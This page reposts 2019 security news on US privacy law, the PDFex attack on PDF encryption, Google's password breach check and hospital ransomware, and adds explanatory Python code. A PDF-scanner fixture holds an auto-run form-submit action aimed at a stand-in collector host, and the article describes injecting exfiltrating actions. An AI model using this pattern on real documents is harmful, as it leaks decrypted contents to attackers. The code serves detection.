October 3, 2019

No federal privacy law will make it in the US this year, sources say

By Lisa Vaas

You know about that one, much-hemmed-and-hawed-over, GDPR-ish, national, US privacy law? The one we don’t have? The lack of which means the country’s data privacy landscape is made up of a crazy quilt of state laws?

Not happening. Not this year.

In spite of the US Federal Trade Commission (FTC) marching down to Capitol Hill to beat the drum for a unified federal privacy law (and more regulatory powers to enforce it), and in spite of both the House and Senate holding hearings on privacy legislation, transparency about how data is collected and shared, and the stiffening of penalties for data-handling violations, the US is not likely to see an online privacy bill come before Congress this year.

That’s according to Reuters’ anonymous sources, who say that lawmakers haven’t managed to agree on issues such as whether the bill would preempt state rules.

And when we’re talking about state rules, we’re talking about the elephant in the room: California’s Consumer Privacy Act (CCPA), which goes into effect on 1 January 2020.

In lieu of a federal law – the one we’re not getting this year because nobody can agree on what it should do – the CCPA might turn into the de facto privacy rule of the land. Tech companies are terrified that it’s going to be strict, and it’s going to be expensive for all the companies that slurp up consumer data to track us, market at us and profit from selling our data… or which screw up by fumbling that data, or which quietly pickpocket that data, as the case may be.

In hearings over possible privacy legislation – which neither you nor I have been invited to, fellow citizen, though tech companies have – lawmakers and online advertising representatives have grumbled about tough laws such as the CCPA and the EU’s General Data Protection Regulation (GDPR), saying that such strict laws could lead to businesses being swamped by fines and compliance costs, and that consumers have been buried in a blizzard of required notices and privacy policies they don’t bother to read.

Read more at https://nakedsecurity.sophos.com/2019/10/03/no-federal-privacy-law-will-make-it-in-the-us-this-year-sources-say/

PDF encryption standard weaknesses uncovered

By John E Dunn

You would be forgiven for thinking that encrypting PDFs, before they are stored or sent via email, keeps their contents away from prying eyes.

But according to researchers in Germany, it might be time to revisit that assumption after they discovered weaknesses in PDF encryption which could be exploited to reveal the contents of a file to an attacker.

Dubbed ‘PDFex’ (PDF exfiltration), the weaknesses documented in Practical Decryption exFiltration: Breaking PDF Encryption by researchers from Ruhr University Bochum and the Münster University of Applied Sciences, offer two attack methods, each with three variants that depend on which PDF viewer is used to open a target document.

Attack #1 – direct exfiltration

The PDF standard ships with native AES symmetric encryption which secures documents using a password communicated to the recipient (arguably a weakness in itself) or, in some installations, through public key encryption.

However, the researchers quickly discovered a hole in this method, so glaringly obvious that it’s surprising nobody’s noticed it before. The PDF standard allows for partially encrypted documents that include a mix of both encrypted and unencrypted sections, and does not include integrity checking. This means an attacker can add additional sections or interactive Actions to an encrypted PDF without raising any alarms, said the researchers in their overview:

The most relevant object for the attack is the definition of an Action, which can submit a form, invoke a URL, or execute JavaScript.

Actions can be set to run when a document is opened or something within the document is clicked on, and send the decrypted contents to an attacker’s server.
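The mechanism described above (partial encryption, no integrity check, an Action that fires on open) suggests a simple triage check a defender can run on incoming PDFs before opening them: does the file declare encryption, and does it also carry unencrypted Action objects that could submit a form, invoke a URL or run JavaScript? The script below is an added example, not code from the researchers or from the PDFex paper. It is a heuristic string scan over the raw file using the PDF specification's own dictionary names (/Encrypt, /OpenAction, /AA, /SubmitForm, /URI, /JavaScript); it does not parse object streams, so a real pipeline would use a proper PDF parser. The two sample documents are constructed fixtures, not real PDFex payloads, and the URL in them is a placeholder.

```python
"""Heuristic triage of a PDF for the PDFex pattern: encryption declared in the
trailer combined with plaintext Action objects that run on open or on click.
String scan only; compressed object streams would hide these names."""
import re
from typing import Dict, List

# Triggers (when an action runs) and action subtypes (what it does), from the PDF spec.
TRIGGER_KEYS = (b"/OpenAction", b"/AA")
ACTION_SUBTYPES = (b"/SubmitForm", b"/URI", b"/JavaScript")
NETWORK_ACTIONS = ("/SubmitForm", "/URI", "/JavaScript")

# /URI (url) in a URI action, /F (url) in a SubmitForm action.
URL_RE = re.compile(rb"/(?:F|URI)\s*\(\s*([^)]*)\)")

# Constructed fixture: trailer declares /Encrypt, catalog carries an /OpenAction
# that submits the form to a placeholder URL. Not a working exploit document.
SAMPLE_TAMPERED = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /Pages 2 0 R
   /OpenAction << /S /SubmitForm /F (http://collector.example/submit) /Flags 4 >> >>
endobj
2 0 obj
<< /Type /Pages /Kids [] /Count 0 >>
endobj
trailer
<< /Root 1 0 R /Encrypt 5 0 R /ID [<00> <00>] >>
%%EOF
"""

# Constructed fixture: encrypted, but no actions at all.
SAMPLE_CLEAN = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /Pages 2 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [] /Count 0 >>
endobj
trailer
<< /Root 1 0 R /Encrypt 5 0 R /ID [<00> <00>] >>
%%EOF
"""


def is_encrypted(pdf: bytes) -> bool:
    """A standard-security PDF has an /Encrypt entry in its trailer dictionary."""
    return b"/Encrypt" in pdf


def find_actions(pdf: bytes) -> List[str]:
    """Return every trigger and action-subtype name present in the raw bytes."""
    return [key.decode() for key in TRIGGER_KEYS + ACTION_SUBTYPES if key in pdf]


def find_urls(pdf: bytes) -> List[str]:
    """Return literal-string URLs attached to URI or SubmitForm actions."""
    return [m.decode(errors="replace") for m in URL_RE.findall(pdf)]


def assess(pdf: bytes) -> Dict[str, object]:
    """Flag the open-and-send combination: encrypted + trigger + outbound action."""
    actions = find_actions(pdf)
    has_trigger = any(a in actions for a in ("/OpenAction", "/AA"))
    has_network = any(a in actions for a in NETWORK_ACTIONS)
    return {
        "encrypted": is_encrypted(pdf),
        "actions": actions,
        "urls": find_urls(pdf),
        "suspicious": is_encrypted(pdf) and has_trigger and has_network,
    }


if __name__ == "__main__":
    for name, doc in (("tampered", SAMPLE_TAMPERED), ("clean", SAMPLE_CLEAN)):
        print(name, assess(doc))
```

A hit is a reason to open the file in a viewer with JavaScript and form submission disabled, or not at all, rather than proof of tampering: legitimate encrypted forms also submit data. The useful signal is the combination the article describes, an encrypted document whose actions the author could not have protected because the format does not integrity-check them.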

Read more at https://nakedsecurity.sophos.com/2019/10/03/pdf-encryption-standard-weaknesses-uncovered/

Google’s Password Manager now checks for breached credentials

By Danny Bradbury

Google has taken the next step in its strategy to secure users’ passwords. The search giant has taken a password-checking feature released early this year as an extension to its Chrome browser and embedded it directly into its password manager service.

In February, the search and advertising giant released Password Checkup, a Chrome extension that checks passwords to see if they are secure. When users enter a username and password, the extension checks a hashed version of the credentials against Google’s internal database of four billion unsafe logins. If the extension finds a match, it will warn the user and suggest that they reset their password.

Now, the company has decided to integrate this feature directly into its password manager, which is the feature in Chrome that asks if you want to save the login credentials for online services and reuse them later.
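The article says the check compares a hashed version of the credentials against a database of known-bad logins. One widely used way to do that without handing the server the full hash is a hash-prefix (k-anonymity) lookup: the client hashes the credential, sends only a short prefix, receives every suffix stored under that prefix, and finishes the comparison locally. The code below is an added illustration of that design, not Google's own code, and the page does not describe Google's actual protocol, so the prefix length, the hash construction and the breach corpus are all assumptions; the breach corpus is a constructed sample.

```python
"""Hash-prefix breached-credential check (k-anonymity style lookup).
The server sees only a short prefix of the credential hash, never the
username, the password or the full hash."""
import hashlib
from typing import Dict, Iterable, List, Set, Tuple

# Assumption: number of hex characters the client reveals to the server.
PREFIX_LEN = 5

# Constructed sample standing in for the service's database of unsafe logins.
BREACHED_LOGINS: List[Tuple[str, str]] = [
    ("alice@example.com", "password123"),
    ("bob@example.com", "letmein"),
    ("carol@example.com", "hunter2"),
]


def credential_hash(username: str, password: str) -> str:
    """Hash the username:password pair so a match means this login, not merely
    a common password. Username is normalised (trimmed, lowercased) first."""
    data = f"{username.strip().lower()}:{password}".encode("utf-8")
    return hashlib.sha256(data).hexdigest()


def build_index(breached: Iterable[Tuple[str, str]]) -> Dict[str, Set[str]]:
    """Server side: bucket full hashes by prefix, storing only the suffixes."""
    index: Dict[str, Set[str]] = {}
    for user, pwd in breached:
        digest = credential_hash(user, pwd)
        index.setdefault(digest[:PREFIX_LEN], set()).add(digest[PREFIX_LEN:])
    return index


def server_lookup(index: Dict[str, Set[str]], prefix: str) -> List[str]:
    """Server side: answer a prefix query with every suffix in that bucket.
    The server cannot tell which suffix, if any, the client cares about."""
    return sorted(index.get(prefix, set()))


def is_breached(index: Dict[str, Set[str]], username: str, password: str) -> bool:
    """Client side: hash locally, query by prefix, compare the suffix locally."""
    digest = credential_hash(username, password)
    suffixes = server_lookup(index, digest[:PREFIX_LEN])
    return digest[PREFIX_LEN:] in suffixes


if __name__ == "__main__":
    idx = build_index(BREACHED_LOGINS)
    for user, pwd in (("alice@example.com", "password123"),
                      ("alice@example.com", "correct-horse-battery")):
        verdict = "unsafe, reset it" if is_breached(idx, user, pwd) else "no match"
        print(f"{user}: {verdict}")
```

With a real corpus of billions of entries a five-character prefix still returns hundreds of suffixes per query, which is what keeps the server from learning which login the client holds; the client-side suffix comparison is the part that must never be moved to the server.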

Read more at https://nakedsecurity.sophos.com/2019/10/03/googles-password-manager-now-checks-for-breached-credentials/

Ransomware attacks paralyze, and sometimes crush, hospitals

By Lisa Vaas

Major hospitals and some health clinics in the US and Australia have been crippled in new ransomware attacks, forcing some into emergency manual mode and one to close permanently due to extensive loss of patient healthcare records encrypted by data kidnappers.

In Australia, the toll is seven hospitals. According to an advisory issued on Tuesday by Victoria’s Department of Premier and Cabinet, a ransomware attack discovered on Monday has blocked access to several key systems, including financial management.

The hospitals and health services, which are located in Gippsland and south-west Victoria, have isolated a number of systems, taking them offline so as to quarantine the infection.

Isolating the systems has led to the shutdown of some patient record, booking and management systems, which may affect patient contact and scheduling. Where practical, some of the hospitals are reverting to manual systems to maintain patient services.

Loss of access to patient histories, charts, images and other information has forced the hospitals to rework bookings and scheduling so as to minimize disruption of service.

Meanwhile, in the US, three medical centers in western Alabama said this week that they’re not taking new patients due to a ransomware attack. According to a press release put out on Tuesday, elective procedures and surgeries scheduled for the next day – Wednesday, 2 October – would be going ahead as planned, with the centers running on “downtime” procedures that they say enable them to provide “safe and effective care” for those patients.

Current patients are staying put: they’re not being transferred to other medical centers. New admissions for critical cases are being diverted to other facilities, however. As for tests and other procedures, patients are being advised to call before they show up.

Read more at https://nakedsecurity.sophos.com/2019/10/03/ransomware-attacks-paralyze-and-sometimes-crush-hospitals/

Advanced Computer Services of Central Florida

Centrally located in Winter Haven, we serve residential and business clients in and around Polk County.

9 Camellia Drive
Winter Haven, FL 33880

Our Promise to You

Plain language, no tech-talk

We will never try to over-sell you a product you don't need.

Advanced Computer Services of Central Florida is your local, hometown computer service and repair company that can do more than just fix your PC. We offer highly skilled professionals who can be counted on to give you sound advice on upgrades, software and hardware, commercial & residential networks, hardwire or secure wireless.

No trip charges within Polk County

No after-hours or weekend fees

$45.00/hr Residential

$65.00/hr Commercial - free system evaluation